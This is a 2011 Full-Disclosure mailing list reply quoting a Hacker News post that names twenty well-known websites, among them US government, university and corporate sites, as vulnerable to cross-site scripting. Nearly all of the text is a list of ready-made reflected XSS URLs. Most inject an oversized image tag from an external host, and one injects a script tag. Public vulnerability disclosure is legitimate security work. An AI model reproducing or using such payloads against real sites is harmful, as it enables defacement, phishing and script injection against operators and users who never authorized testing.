Re: 20 Famous websites vulnerable to Cross Site Scripting (XSS) Attack

[GloW - XD <doomxd () gmail com>]

Very nice :)
Impressive for XSS (for once).
xd




On 7 September 2011 09:28, Mohit Kumar <thehackernews () gmail com> wrote:

> Most of the biggest and Famous sites are found to be Vulnerable to XSS
> attack . Cross-site scripting (XSS) is a type of computer security
> vulnerability typically found in web applications which allow code injection
> by malicious web users into the web pages viewed by other users. Examples of
> such code include HTML code and client-side scripts. An exploited cross-site
> scripting vulnerability can be used by attackers to bypass access controls
> such as the same origin policy. Recently, vulnerabilities of this kind have
> been exploited to craft powerful phishing attacks and browser exploits.
> Cross-site scripting was originally referred to as CSS, although this usage
> has been largely discontinued.
>
> Hacker with code name "*Invectus*" list some such famous sites with
> XSS vulnerability as listed below :
> *1.)*
> http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D
>
> *2.)*
> http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *3.)*
> http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false
>
> *4.) *
> http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit
>
> *5.) *
> http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *6.)*
> http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *7.)*
> http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *8.)*
> http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *9.)*
> http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *10.)*
> http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *11.)*
> http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *12.)*
> http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu
>
> *13.) *
> http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *14.)*
> http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13
>
> *15.)*
> http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *16.)*
> http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6
>
> *17.)*
> http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *18.)*
> http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966
>
> *19.)*
> https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *20.)*
> http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E
>
> Original Post ;  : The Hacker News ~
> http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html
> --
> *Regards,*
> *Owner,*
> *The Hacker News <http://www.thehackernews.com/>*
> *Truth is the most Powerful weapon against Injustice.*
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/